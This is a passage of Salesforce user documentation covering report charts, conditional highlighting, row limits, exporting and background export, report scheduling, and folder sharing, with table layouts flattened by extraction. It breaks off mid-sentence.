User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

To set conditional highlighting, click Show > Conditional Highlighting in report builder, then set the breakpoint values and
their range colors as follows:

DescriptionField

Choose a summary field whose number ranges you want represented by colors.Summary

Select a color to represent data that falls below the Low Breakpoint value.Low Color

The number that acts as the threshold between the Low Color and the Mid Color. Values
that are exactly the same as the Low Breakpoint value are shown as the Mid Color.

Low Breakpoint

Select a color to represent data that falls between the Low Breakpoint and High Breakpoint
values.

Mid Color
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DescriptionField

The number that acts as the threshold between the Mid Color and the High Color. Values
that are exactly the same as the High Breakpoint value are shown as the High Color.

High Breakpoint

Select a color to represent data that falls above the High Breakpoint value.High Color

See Also:
Show Report Data in Tables
Build a New Report

Use a Tabular Report in a Dashboard

You can use a tabular report as the source report for a dashboard table or chart component, if you limit the number of rows it
returns.

Available in: All editions except Database.com

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

1. Click Add > Row Limit.
2. Set the Row Limit to 10, 25, or Custom. If you choose custom enter a number between one and 99.
3. Set the Sort By and sort order options. If you chose Limit Rows by this Field for a column, these options are already

set.
4. Click OK.
5. Click Dashboard Settings in the toolbar.
6. Choose a Name and Value to use in dashboard tables and charts. Tables show both name and value. Charts are grouped

by name.
7. Click OK. You can now use this tabular report as the source report for a dashboard component.

Tip:  When you create a dashboard component to display your tabular report, you can use the dashboard component
editor to override the settings you chose in Dashboard Settings.

See Also:
Show Report Data in Tables
Share Insights with Dashboards
Filter Your Report Data
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Limit Report Results

Set limits to the scope of your report to avoid processing too many records. The built-in choices for limiting your results vary
according to the object you are reporting on.

Available in: All editions except Database.com

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

• To see a collapsed view of a report showing only the headings, subtotals, and total in report builder, deselect Show >
Details.

On the report run page, click Hide Details or Show Details at the top of the report.

• To filter by a field, click Add > Field Filter. With tabular, summary, and matrix reports, you can drag a field from the
Fields pane to the Filters pane to add a report filter.

• Cross filters work like ordinary filters, but they have some special characteristics of their own. To add one, click Add >
Cross Filter.

• In Professional, Enterprise, Unlimited, and Developer edition organizations, the Hierarchy links let you browse report
results based on the role or territory hierarchies.

• If your organization uses divisions to segment data and you have the “Affected by Divisions” permission, use the Division
drop-down list to include records in just one division or all divisions. Select Current to show records in your current
working division. Reports that are already scoped (such as My Cases or My team’s accounts) include records in all divisions,
and you can't further limit them to a specific division. If you do not have the “Affected by Divisions” permission, your
reports include records in all divisions.

• You can set the maximum number of records to display in a tabular report by clicking Add > Row Limit in report builder.
Set the number of rows, then choose a field to sort by, and the sort order. Limiting rows on a tabular report allows you to
use it as a source report for dashboard table and chart components.

The Row Limit option on tabular reports shows only fields from the primary object on reports created from custom report
types where object A may or may not have object B. For example, in an accounts with or without contacts report, only
fields from accounts are shown. Fields from objects after a may-or-may-not association on custom report types aren't
shown. For example, in an accounts with contacts with or without cases report, only fields from accounts and contacts are
available to use. If you change the report format, Row Limit settings are lost.

Note: Only the first 255 characters in a custom text field count for filtering purposes. For example, if you add a field
filter to find opportunities where the custom text field Customer notes includes the word “phone,” but “phone”
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appears after the 255th character in the field, the filter will not find that record. In standard text fields, all characters
count, regardless of the length of the field.

See Also:
Show Report Data in Tables
The Report Run Page
Report on Related Objects with Cross Filters

Show Report Data Graphically
To help readers understand your data quickly and easily, show the data in chart form. Charts appear just above the report
table. They can help users get a feel for the data before they delve into the details. Use line charts to track changes over time,
or a bar or pie chart to compare values at a point in time. Charts can also appear in dashboard components.

See Also:
Communicate Your Report Data Effectively
Add a Chart to a Report
Chart Properties
Present Data Effectively with Charts
Show Different Data Sets in One Chart
Combination Chart Examples
Chart Formatting Options
Present Data Effectively with Charts
Add a Chart to a Report
Chart Properties
Combination Chart Examples
Show Different Data Sets in One Chart

Add a Chart to a Report

Add a chart to give users a visual way to understand the data in your report.

Available in: All editions except Database.com

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:
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Note:  Your report must have at least one grouping before you can add a chart.

To add or edit a chart:

1. Click Add Chart in report builder. For existing charts, click Edit Chart.
2. Select a chart type.
3. Enter the appropriate settings on the Chart Data tab for the chart type you selected.
4. Enter the appropriate settings on the Formatting tab.
5. Click OK.

See Also:
Show Report Data Graphically
Chart Types
Present Data Effectively with Charts
Build a New Report

Chart Properties

You can add a chart to any standard or custom summary or matrix report. The chart properties specify the data that appears
in the chart, its labels and colors, and any conditional highlighting you apply.

Available in: All editions except Database.com

User Permissions Needed

“Create and Customize Reports”To create, edit, and delete reports:

Note:  This topic only applies if you're not using report builder. Report builder is a visual editor for reports.

To customize chart properties, click Add Chart or Edit Chart in any matrix or summary report, and use the fields on the
Chart Data and Formatting tabs.

See Present Data Effectively with Charts on page 2709 for limits, considerations, and tips.

Chart Data Settings

Control the data that appears in your chart with these options.

DescriptionField

Select the type of chart to use when representing the data in your report. The chart type
that you choose determines which chart properties are available to set.

Chart Type
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DescriptionField

Choose what values to display on the axes of your chart. Depending on the chart type,
axis values can be record count, summary fields, or groupings defined in the report.

X-Axis and Y-Axis

Note:  If the Y-axis corresponds to a custom summary formula that has the
Where Will this Formula Be Displayed? option set to a grouping
level other than All summary levels, then the X-axis and Groupings
selection must correspond to that custom summary formula's grouping level.

Select this option to plot additional values on this chart. The chart type you chose must
allow combination charts.

Combination Chart

Choose how to group information on your chart. You can only pick from groupings
defined in the report. For bar and column charts, click an icon to select the grouping

Groupings

display: side-by-side, stacked, or stacked to 100%. For either single or grouped line charts,
you can select Cumulative.

Choose what to display as values for your pie, donut, or funnel chart.Values

Choose what to display as wedges for your pie or donut chart.Wedges

Choose what to display as segments for your funnel chart.Segments

Chart Presentation

Control the appearance and behavior of your chart using these options.

DescriptionField

Enter a name for the chart.Chart Title

Select the color for the text of your chart title.Title Color

Select the font size for the text of your chart title. The maximum size is 18. Larger values are
shown at 18 points.

Title Size

Select a color for all the text and labels in your chart.Text Color

Select a font size for all the text and labels in your chart. The maximum size is 18. Larger values
are shown at 18 points.

Text Size

Choose a direction for a gradient color background. Also select a Start Color and End Color
for the gradient. Use white for both if you do not want a background design.

Background Fade

Choose a place to display the legend in relation to your chart.Legend Position

Combine all groups less than or equal to 3% of the total into a single “Others” wedge or segment.
Deselect to show all values individually on the chart. This only applies to pie, donut, and funnel
charts. This option is on by default for pie and donut charts, and off for funnel.

Combine Small
Groups into
“Others”

Choose a manual or automatic axis range for bar, line, or column charts. If you choose manual,
enter numbers for the minimum and maximum axis values to be displayed. If there are data points

X- or Y-Axis Range

outside the range that you set, the axis automatically extends to include those values when you
generate the chart.

Display labels for each axis of your chart. This only applies to bar and line charts.Show Axis Labels

Display labels for your pie, donut, or funnel chart.Show Labels
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DescriptionField

Display the percentage value for each group in the chart.Show Group %

Display the values of individual records or groups on the chart axis. This only applies to certain
horizontal bar and vertical column charts.

Show X- or Y-Axis
Values

Display the values of individual records or groups on the chart. This only applies to certain chart
types.

Show Values

Display the percentage value for each wedge of pie and donut charts.Show Wedge %

Display the total value for the donut chart.Show Total

Display the percentage value for each segment of funnel charts.Show Segment %

Display values, labels, and percentages when hovering over charts. Hover details depend on chart
type. Percentages apply to pie, donut, and funnel charts only. Hover is disabled when viewing
charts that have more than 200 data points.

Show Details on
Hover

Select a size for the chart, from Tiny to Extra Large.Chart Size

Place the chart above or below your report.Chart Position

Conditional Highlighting

Highlight field values on summary or matrix reports based on ranges and colors you specify. To enable conditional highlighting,
your report must contain at least one summary field or custom summary formula.

DescriptionField

Choose a summary field whose number ranges you want represented by colors.Summary

Select a color to represent data that falls below the Low Breakpoint value.Low Color

The number that acts as the threshold between the Low Color and the Mid Color. Values
that are exactly the same as the Low Breakpoint value are shown as the Mid Color.

Low Breakpoint

Select a color to represent data that falls between the Low Breakpoint and High Breakpoint
values.

Mid Color

The number that acts as the threshold between the Mid Color and the High Color. Values
that are exactly the same as the High Breakpoint value are shown as the High Color.

High Breakpoint

Select a color to represent data that falls above the High Breakpoint value.High Color

See Also:
Show Report Data Graphically
Chart Types
The Report Builder Screen

2708

Gather Data with ReportsGather Data



Present Data Effectively with Charts

When you add a chart to a report, things like negative values, very large or small numbers, custom summary formulas, and
field-level security can affect the charts’ appearance. Switching the report format and changing groupings and blocks also
affects charts.

Available in: All editions except Database.com

• You can't have more than 250 groups or 4,000 values in a chart. If you see an error message saying that your chart has too
many groups or values to plot, adjust the report filters to reduce the number. In combination charts, all groups and values
count against the total.

• If you lose access to a field used in a chart, another field may be used in its place. If no other fields are available, record
count is used.

• Decimal-place precision on charts is not customizable. Numeric and currency values round to two decimal places. Percentage
values round to one decimal place.

• If numeric values are too large or too small, they are shown in scientific notation. For example, the number 5,750,000,000
is displayed as 5.75E9; -0.0000000061 is displayed as -6.1E-9.

• Negative values are displayed on all line charts and non-stacked bar and column charts. Negative values on pie, donut,
funnel, and stacked charts are not displayed. Groupings containing negative values are displayed in the legend, and negative
values are reflected in the calculation of all summary values, including the total for donut charts.

• When creating charts, don't group by a field on a child object then sum by a field on the parent object. It's not good practice.
If you do this with a donut chart, the total shown may not match the sum of the wedges.

• Dashboard and report charts that display values from custom summary formulas display decimal places using your default
currency setting instead of what you specified for the formula. For example, if the summary formula specifies zero decimal
places, no decimal places appear in columns, but chart values show the number of decimal places specified for your default
currency (usually two decimal places). This applies to currencies, numbers, and percentages.

• With joined reports, summary field names contain both the field name and the block name. For example, if you’ve
summarized the Amount field in Block 1, it appears as Block 1 — Sum of Amount in the Chart Editor. A cross-block
or standard custom summary formula contains the block name when the formula is included in multiple blocks.

• When a report already has a chart, changing the report format or removing blocks, groupings, or summary fields has impacts
described in this table.

The effect is ...When you make this change ...

All charts are removed from the report.Switch format from summary, matrix,
or joined to tabular

The first summary grouping becomes the first row grouping. The second becomes
the first column grouping. The third becomes the second row grouping. The
chart is unchanged.

Switch format from summary to matrix

The first row grouping becomes the first summary grouping. The second row
grouping becomes the third summary grouping. The first column grouping

Switch format from matrix to summary

becomes the second summary grouping. The second column grouping is removed.
If the chart used the second column grouping, that grouping is replaced by the
first available summary field that’s not already used in the chart.
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The effect is ...When you make this change ...

The existing report becomes the first block and the chart remains in the report.

If the matrix report used the second column grouping, that grouping is replaced
by the first available summary field that’s not already used in the chart.

Switch format from summary or matrix
to joined

If the summary or matrix report included a grouping from a bucket field, the
grouping is replaced with the next available grouping not already used in the
chart.

The first block becomes the report, and groupings and the chart are preserved.
If the chart in the joined version contained summary fields from the first block,

Switch format from joined to summary
or matrix

they remain in the chart in the summary report. Summaries from other blocks
are removed from the chart.

The summary field is replaced with the next available summary field. If no
additional summary fields are available, the original field is replaced with the

Remove a block containing a summary
field from a joined report

record count from the first remaining block. Removing all blocks from a report
removes the chart completely.

The grouping is replaced with the next available grouping. If all groupings are
removed, the chart is removed as well. Note that groupings can be removed

Remove a grouping used in the chart

automatically when you add a report type to a joined report or if a field becomes
unavailable, for example as a result of field-level security.

The summary field is replaced with the next available summary field. If no
additional summary fields are available, the field is replaced with the record count

Remove a summary field used in the
chart (including custom and cross-block
summaries) for either the report or the first block. Note that summary fields can be removed

automatically, for example as a result of field-level security or when the report
format changes.

See Also:
Show Report Data Graphically
Add a Chart to a Report
Chart Formatting Options
Show Different Data Sets in One Chart

Show Different Data Sets in One Chart

A combination chart plots multiple sets of data on a single chart. Each set of data is based on a different field, so values are easy
to compare. You can also combine certain chart types to present data in different ways in a single chart.

Available in: All editions except Database.com
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User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

With combination charts, you can:

• Add a line to an existing line, vertical column, grouped vertical column, or stacked vertical column chart.

• Add a cumulative line to an existing line cumulative chart.

• Add up to three columns to a vertical column chart.

• Add up to three bars to a horizontal bar chart.

For example, if you are a sales manager, you might wish to see “Pipeline amount” as a line and “Number of open deals” as
vertical bars, on the same chart.

1. Edit the chart for any summary or matrix report, or edit a dashboard component that displays a summary or matrix report.
2. Choose a chart type that allows combination charts:

• Bar chart
• Column chart
• Grouped column chart
• Stacked column chart
• Line chart
• Cumulative line chart

3. Select the Plot additional values checkbox. The chart preview updates as you configure your combination chart.
4. Select a Value to plot on the chart.
5. Choose a Display option. Available options differ based on your chart typ and whether you’re editing a chart or a dashboard

component.

• For columns or bars, click Add Bar or Add Column links to add up to three sets.
• When adding a line to a vertical column chart, select Use second axis to show a separate axis for the added line on the

right side of the column chart. A separate axis can be useful when the two values have different ranges or units.

Note:  Selecting Use second axis makes more values available in the Value drop-down list. Without this
option, you can only pick from values of the same type as the primary Y-axis—for example, number, currency,
or percentage. This option is only available for certain combination charts.

6. Once you've set up your report, click Run Report or Save.

Note:

• If you lose access to a field used in a chart, another field may be used in its place. If no other fields are available,
record count is used.

• To show combination charts in a dashboard, use the Use chart as defined in source report option.
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• Filtered drill-down doesn't work for combination charts in dashboards.

See Also:
Show Report Data Graphically
Chart Types
Add a Chart to a Report
Combination Chart Examples

Combination Chart Examples

Use a combination chart to show multiple values against a single axis range, show two chart types together, or compare two
continuous summary values.

A combination chart plots multiple sets of data on a single chart.

Column-on-Column

Add columns to a column chart to show multiple values against a single axis range.

To create the chart in this example, choose the Vertical Column chart type, set the opportunity sum of amount as the
Y-Axis, stage as the X-Axis, and use the Plot additional values option to add the sum of expected revenue as a column.

You can quickly compare the actual values against the expected values for each stage.

Line-on-Column

Add a line to a column chart to show two chart types together. Using a second axis allows you to add different types of
values to the chart.

To create the chart in this example, choose the Vertical Column chart type, set the opportunity sum of amount as the
Y-Axis, fiscal year as the X-Axis, and use the Plot additional values option to add the number of deals as a line.
Summary values of different types won't be available in the Values drop-down list unless you select Use second axis.

You can see both the total amount and number of deals for each year on a single chart.
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Line-on-Line

Add a line to a line chart to compare two continuous summary values.

To create the chart in this example, set up a custom summary formula to calculate a three-week moving average of
opportunity amounts, then choose the Line chart type, set the opportunity sum of amount as the Y-Axis, date as the
X-Axis, and use the Plot additional values option to add the calculated three-week moving average as a line.

You can compare sales against the moving average over time.

The custom summary formula used in this example is shown here:

(OppProductTrends__c.Amount__c:SUM+ PREVGROUPVAL(OppProductTrends__c.Amount__c:SUM,
OppProductTrends__c.as_of_date__c) + PREVGROUPVAL(OppProductTrends__c.Amount__c:SUM,
OppProductTrends__c.as_of_date__c,2))/3

See Also:
Show Report Data Graphically
Show Different Data Sets in One Chart
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Chart Formatting Options

Control the appearance and behavior of your chart using these options.

DescriptionField

Enter a name for the chart.Chart Title

Select the color for the text of your chart title.Title Color

Select the font size for the text of your chart title. The maximum size is 18. Larger values are
shown at 18 points.

Title Size

Select a color for all the text and labels in your chart.Text Color

Select a font size for all the text and labels in your chart. The maximum size is 18. Larger values
are shown at 18 points.

Text Size

Choose a direction for a gradient color background. Also select a Start Color and End Color
for the gradient. Use white for both if you do not want a background design.

Background Fade

Choose a place to display the legend in relation to your chart.Legend Position

Combine all groups less than or equal to 3% of the total into a single “Others” wedge or segment.
Deselect to show all values individually on the chart. This only applies to pie, donut, and funnel
charts. This option is on by default for pie and donut charts, and off for funnel.

Combine Small
Groups into
“Others”

Choose a manual or automatic axis range for bar, line, or column charts. If you choose manual,
enter numbers for the minimum and maximum axis values to be displayed. If there are data points

X- or Y-Axis Range

outside the range that you set, the axis automatically extends to include those values when you
generate the chart.

Display labels for each axis of your chart. This only applies to bar and line charts.Show Axis Labels

Display labels for your pie, donut, or funnel chart.Show Labels

Display the percentage value for each group in the chart.Show Group %

Display the values of individual records or groups on the chart axis. This only applies to certain
horizontal bar and vertical column charts.

Show X- or Y-Axis
Values

Display the values of individual records or groups on the chart. This only applies to certain chart
types.

Show Values

Display the percentage value for each wedge of pie and donut charts.Show Wedge %

Display the total value for the donut chart.Show Total

Display the percentage value for each segment of funnel charts.Show Segment %

Display values, labels, and percentages when hovering over charts. Hover details depend on chart
type. Percentages apply to pie, donut, and funnel charts only. Hover is disabled when viewing
charts that have more than 200 data points.

Show Details on
Hover

Select a size for the chart, from Tiny to Extra Large.Chart Size
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DescriptionField

Place the chart above or below your report.Chart Position

See Also:
Show Report Data Graphically
Add a Chart to a Report

Deliver Your Report
To get the information in your report to the people who need it, you can share the report’s URL, make the report available
for Chatter feeds, or export the data to another tool, such as Excel. You can also set the report to run on a schedule so that
viewers always have the latest information.

Administrators, or users with the “Manage Public Reports” and “Create and Customize Reports” permissions, can create
custom reports that all users can view. They can also organize reports by creating custom report folders and configuring which
groups of users have access to them.

To make a report public, run the report and click Save As. Give the report a name and choose a public report folder.

See Also:
Communicate Your Report Data Effectively
Export Report Data
Schedule Reports
Export a Report
Schedule a Report for Refresh

Export Report Data

You can export your report data to a reusable format when you need to work with it in a dedicated tool, such as Microsoft
Excel.

Available in: All editions except Database.com

User Permissions Needed

“Export Reports”To export reports:

Note:  For security purposes, Salesforce may require users to pass a CAPTCHA user verification test to export data
from their organization. This simple text-entry test prevents malicious programs from accessing your organization's
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data. To pass the test, users must correctly type the two words displayed on the overlay into the overlay's text box
field. Note that the words entered into the text box field must be separated by a space.

See Also:
Deliver Your Report
Export a Report
Locale Settings for Exporting Report Data
Export Reports in the Background

Export a Report

From the Reports tab, you can export data for a selected report to Excel or in comma-delimited format.

Available in: All editions except Database.com

User Permissions Needed

“Export Reports”To export reports:

1. On the Reports tab for a selected report, click  > Export.

• If you set the “Do not save encrypted pages to disk” option in Internet Explorer, you will not be able to open your
report online in Excel. You must save the exported report to your computer, and then open it in Excel. To change this
setting in Internet Explorer, deselect “Do not save encrypted pages to disk” under Internet options.

• Reports in the joined format can’t be exported, but you can choose a printable view.

2. Set the Export File Encoding for your language.
3. Set the Export File Format to Excel or comma delimited.
4. Click Export.
5. In your browser’s dialog, choose to save the file.

You can export up to 256 columns and 65,536 rows of data in one report.

See Also:
Export Report Data
Export Reports in the Background
Locale Settings for Exporting Report Data
Print a Report
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Locale Settings for Exporting Report Data

Some tips on using the comma-delimited format and working with Excel when you export report data.

Available in: All editions except Database.com

Exporting in Comma Separated Value Format

When exporting reports in the comma-separated values (.csv) format, the locale settings on your user detail page determine
the field separator (delimiter) included in the exported file. For example, if your locale setting is English (United States), the
decimal separator is a period (“.”), If your locale setting is French (France), the decimal separator is a comma (“,”). You can
override the default separator for your locale by choosing Comma Delimited (non-locale) .csv from the Export File Format
drop-down list.

Note that Excel does not display the field separator in .csv format. If you want to export reports to Excel in .csv format, we
recommend that your locale setting in Salesforce match your Regional Options setting in Windows.

See Also:
Export Report Data
Export a Report
Print a Report

Export Reports in the Background

Export reports in the background so you can continue working in Salesforce without waiting for report results to display.

Available in: Enterprise and Unlimited Editions

User Permissions Needed

“Background Report Export”To export reports to the background:

“Background Report Export”

AND

“View All Data”

To view reports exported to the background by other users:

“Background Report Export”

AND

“Modify All Data”

To manage reports exported to the background by other users:

Exporting reports to the background allows you to successfully run data-intensive reports, which would otherwise time out
due to the large number of report results.
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Note:  Contact salesforce.com to activate this feature for your organization.

See Also:
Export Report Data
The Report Run Page
Create a Custom Report in Accessibility Mode
Create a Report
The Report Builder Screen
Report Run Page Options
Export a Report
Run a Report

Exporting Reports to the Background

To export a report to the background:

1. Create a custom report or run an existing report.
2. Click Export Details and choose Run Background Export from the drop-down button.

When running an existing report, click this button to avoid waiting for report results to display.

3. Select a file encoding setting and a file format in which to export the report.
4. Choose how to save the report:

• Click Save revisions to save any parameter changes you made to the report before exporting.

Selecting this option overwrites the parameters of the original report.

• Click Save revisions to a copy to create a new report before exporting. If you select this option, enter a name
and description for the report, and choose a report folder in which to save the report parameters.

Note:  Only report parameters are saved in report folders for reports run in the background. To view report results,
you must view report details from the background report exports list..

5. Click Start Background Export.

After you start a background export of a report, the background report exports list displays.

When your report has finished running and its results are ready for viewing, an email notification is sent to you. The email
notification contains a link that you can click to view the report details, from which you can download the report results
in CSV (comma-separated values) format. You can also download report results from the background report exports list
by viewing report details and then clicking the Click here to download file link..

Note:  If commas are not appropriate for your locale, use a tab or other delimiter.

In the unlikely event that a background export of a report fails, an email notification is sent to you. Reports exported to
the background can fail for a number of reasons. For example, between the time you exported the report and the export
process began, fields may have been deleted from the report, the report may have been deleted, or the status of the custom
report type from which the report was created may have been changed to “In Development.”
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Important:

• When a report exported to the background finishes running, it is available for viewing in the background report
exports list for 48 hours. After 48 hours, the report is automatically deleted. Reports deleted from the background
report exports list are permanently deleted and not sent to the Recycle Bin. Additionally, reports exported to the
background run sequentially, one at a time. Therefore, the latest report exported to the background runs after all
reports that were previously exported to the background finish running.

• You can export an unlimited number of reports to the background.

• If the report takes longer than 30 minutes to complete, Salesforce cancels the report. Try the following techniques
to reduce the amount of data in your report:

◊ Filter for your own records, rather than all records.

◊ Limit the scope of the data to a specific date range.

◊ Exclude unnecessary columns from your report.

◊ Hide the report details.

View and Manage Reports in the Background

You can view and manage reports exported to run in the background from the background report exports list. To view the
background report exports list, from Setup, click Monitoring > Background Report Exports.

From the background report exports list you can:

• View the details of a report exported to the background by clicking the name of a report in the Job Name column. These
details include:

◊ The name of the report

◊ The status of the export

◊ The folder in which the report's parameters are saved

◊ A description of the report

◊ The file extension of the report

◊ The size of the report

◊ The name of the user who submitted the report for export

◊ The date and time the report was originally submitted for export

Additionally, after a report exported to the background has finished running, you can click the Click here to download
file link to download the report results in CSV (comma-separated values) format. You can only download data that you
have permission to view.

Note:  For security purposes, Salesforce may require users to pass a CAPTCHA user verification test to export
data from their organization. This simple text-entry test prevents malicious programs from accessing your
organization's data. To pass the test, users must correctly type the two words displayed on the overlay into the
overlay's text box field. Note that the words entered into the text box field must be separated by a space.

If comma delimiters are not appropriate for your locale, select a tab or other delimiter.

• Click Cancel or Del next to the name of a report to cancel a pending export or to delete a report from the background
report exports list. Reports deleted from the background report exports list are permanently deleted and not sent to the
Recycle Bin.
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When a report exported to the background finishes running, it is available for viewing in the background report exports
list for 48 hours. After 48 hours, the report is automatically deleted. Reports deleted from the background report exports
list are permanently deleted and not sent to the Recycle Bin.

You can export an unlimited number of reports to the background. Additionally, reports exported to the background run
sequentially, one at a time. Therefore, the latest report exported to the background runs after all reports that were previously
exported to the background finish running.

• Click Refresh List to view any reports that have been exported to the background since you began viewing the background
report exports list.

Schedule Reports

You can set up a report to run itself daily, weekly, or monthly and send the results automatically to the people who need to
see them, so that you don’t have to remember to log in and do it yourself.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Schedule Reports”To schedule reports:

Tips for Scheduling Reports (2:19 minutes)

See Also:
Deliver Your Report
Schedule a Report for Refresh
View a Report’s Schedule
Manage a Report’s Schedule
Change a Report’s Schedule
Delete a Report’s Schedule
Tips on Scheduling Reports
Schedule a Report for Refresh
Change a Report’s Schedule
Delete a Report’s Schedule
Manage a Report’s Schedule
Tips on Scheduling Reports
View a Report’s Schedule

Schedule a Report for Refresh

Schedule a report to run daily, weekly, or monthly. The report can be emailed automatically in HTML format to users in your
organization.

Available in: Professional, Enterprise, Unlimited, and Developer Editions
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User Permissions Needed

“Schedule Reports”To schedule reports:

Watch a Demo: Tips for Scheduling Reports (2:19 minutes)

1. On the Reports tab, click an existing report name.
2. Click Schedule Future Runs... from the Run Report drop-down.

If you’re creating a new report, you are asked to save the report with a name and in a folder before scheduling.

3. On the Schedule Report page, specify a Running User who has access to the folder where the report is stored.

The access level of the running user determines what other users, including portal users, see when they receive the scheduled
report run results. You need the “View All Data” permission to specify a running user other than yourself.

Note:  If the running user becomes inactive, the report is not run. The system administrator receives an email
notification to either activate the user, delete the report schedule, or change the running user to an active one in
the scheduled report.

4. Select an email setting:

ToSelect

Send the report to your email address specified on your user profile.To me

Email the report to additional users.To me and/or others...

You can send reports only to email addresses included on Salesforce user records. When portal users receive emailed reports,
they see the same data as the running user set in the report schedule. If you have information you’d rather not share,
schedule the report to run with a portal user as the running user.

Note:  Portal users receive report and dashboard refresh email notifications when the Allow Reports and
Dashboards to Be Sent to Portal Users option is enabled.

5. Set the frequency, duration, and time for running the report:

• In the Frequency field, select Daily, Weekly, or Monthly and then refine the frequency criteria.
• Using the Start and End fields, specify the dates during which you want to schedule the report. To enter the current

date, click the link showing the date.
• Next to Preferred Start Time, click Find available options... to choose a start time.

Your preferred start time might not be available if other users have already selected that time to schedule a report.

6. Click Save Report Schedule. You can choose:

ToChoose

Save both the report schedule and changes you made to the report.Save report modifications with this schedule

Save the schedule only. Changes you made to the report are discarded.Discard report modifications

Report recipients can click the report name in emailed reports to log in to Salesforce and view the report directly.
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Example

A report is scheduled to run every Friday at midnight, and its results are emailed to a selected group and user.

1. All users, including portal users, viewing the scheduled report see the report data that Sales Director Chet’s access level
allows.

2. Report run results are set to be emailed to a public user group called All Internal Users and the admin user.
3. The report is scheduled to run every Friday.
4. The report run is scheduled to start on the current date.
5. The schedule is saved without saving prior changes made to the report.

See Also:
Schedule Reports
Manage a Report’s Schedule
Run a Report

View a Report’s Schedule

View a report’s schedule on the Schedule Report page or from the Reports tab. View all report schedules for the organization
under Setup.

Available in: Professional, Enterprise, Unlimited, and Developer Editions
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User Permissions Needed

“Schedule Reports”To schedule reports:

“View Setup and Configuration”To view all scheduled report for the organization:

Tips for Scheduling Reports (2:19 minutes)

•
To see the schedule for a report on the Reports tab, hover over  in the schedule  column.

This shows the frequency and the date of the next run.

Users without the “Schedule Reports” permission can't see the icon and information.

• To see a report’s run schedule on the Schedule Report page:

1. Click a scheduled report name on the Reports tab.
2. Click Schedule Future Runs... from the Run Report drop-down..

• To see all scheduled reports for your organization, from Setup, click Monitoring > Scheduled Jobs or Jobs > Scheduled
Jobs.

Only users with the “View Setup and Configuration” permission can view this information.

See Also:
Schedule Reports
Manage a Report’s Schedule

Manage a Report’s Schedule

Create, change, view or delete a scheduled report from the Schedule Report page.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Schedule Reports”To schedule reports:

“Modify All Data”To delete a scheduled report run:

Tips for Scheduling Reports (2:19 minutes)

On the Schedule Report page you can:

• Schedule a new or existing report to run in the future and have its results emailed to others.

• Change the schedule on a previously scheduled report.

• View scheduled jobs for all reports in your organization or view the schedule for just a selected report.
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• Delete a scheduled run for a selected report.

Additional scheduled reports may be available for purchase.

See Also:
Schedule Reports
Schedule a Report for Refresh

Change a Report’s Schedule

You can make changes to an already scheduled report on the Schedule Report page.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Schedule Reports”To schedule reports:

Tips for Scheduling Reports (2:19 minutes)

1. On the Reports tab, click the name of the scheduled report.
2. Click Schedule Future Runs... from the Run Report drop-down.
3. Make the required changes on the Schedule Report page.
4. Click Save Report Schedule.

See Also:
Schedule Reports
Manage a Report’s Schedule

Delete a Report’s Schedule

Select a scheduled report and unschedule it to delete its scheduled run.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Schedule Reports”To schedule reports:

“Modify All Data”To delete a scheduled report run:

Tips for Scheduling Reports (2:19 minutes)
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1. On the Reports tab, click the name of the scheduled report.
2. Click Schedule Future Runs... from the Run Report drop-down.
3. Click Unschedule Report.

The run schedule for the report is canceled and not sent to the Recycle Bin.

See Also:
Schedule Reports
Manage a Report’s Schedule

Tips on Scheduling Reports

Some tips to keep in mind about timings, limits, and email notifications when scheduling a report.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Scheduling Report Runs

•
On the Reports tab, hover over  in the schedule column ( ) to view a report’s schedule. Note that users without the
“Schedule Reports” permission can't see this icon and information.

• You can’t create schedules for joined reports.
• Your organization is limited to no more than 200 scheduled reports. Daily limits differ by edition. Additional scheduled

reports may be available for purchase.
• Scheduled reports run in the time zone of the user who set up the schedule. For example, if the Time Zone field on your

user record is set to Pacific Standard Time, and you schedule a report to run every day at 2:00 PM, then the report runs
every day between 2:00 PM and 2:29 PM Pacific Standard Time.

• If you view and save a schedule in a time zone different from the one in which it was previously scheduled, the time slot
could potentially change.

• If you schedule a report to run on a specific day of every month, the report runs only on months that have that specific
day. For example, if you schedule a report to run on the 31st day of every month, then the report runs only on months that
have 31 days. To schedule a report on the last day of every month, choose last from the On day of every month
drop-down list.

• The report runs within 30 minutes of the time you select for Preferred Start Time. For example, if you select 2:00
PM as your preferred start time, the report runs any time between 2:00 PM and 2:29 PM, depending on how many other
reports are scheduled at that time.

• Scheduling reports is not tracked in the audit trail history.

Emailing Scheduled Reports

• Report charts are not included in emailed reports. To email a chart of the report, create a dashboard and schedule a
dashboard refresh.

• Outlook 2007 limitation: Report emails containing tables more than 22 inches wide or with more than 63 columns might
not display properly.

• The maximum size for emailed reports is 10 MB. Try the following techniques to reduce the amount of data in your report:

◊ Filter for your own records, rather than all records.
◊ Limit the scope of the data to a specific date range.
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◊ Exclude unnecessary columns from your report.
◊ Hide the report details.

See Also:
Schedule Reports
Schedule a Dashboard Refresh
Manage a Report’s Schedule

Share Reports and Dashboards
Reports and dashboards are shared through folders. You share the folder, not the report or dashboard itself. To let others work
with your report or dashboard, give them Viewer, Editor or Manager access to the folder where the report or dashboard is
stored.

Available in: All editions except Database.com

See Also:
Communicate Your Report Data Effectively
Share a Report or Dashboard Folder
Access Levels for Report and Dashboard Folders
Comparing Access Levels for Report and Dashboard Folders
User Permissions for Sharing Reports and Dashboards

Share a Report or Dashboard Folder

To enable others to use a report or a dashboard, share the folder it is in. Give each user, public group, or role the degree of
access to the folder that makes sense for them.

Available in: All editions except Database.com

User Permissions Needed

“Manager” folder access or “Manage Reports in Public Folders”To share a report folder:

“Manager” folder access or “Manage Dashboards in Public
Folders”

To share a dashboard folder:

Note:  To give someone access to a folder, you must have either Manager access to that folder or the Manage
Reports in Public Folders user permission (for report folders) or the Manage Dashboards in Public
Folders user permission (for dashboard folders).
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When you create a folder, you’re its manager. Only you, and others with administrative permissions, can see it.

Figure 19: (1) Share your folder by user, by user group, or by role. (2) Choose the access level you want each user,
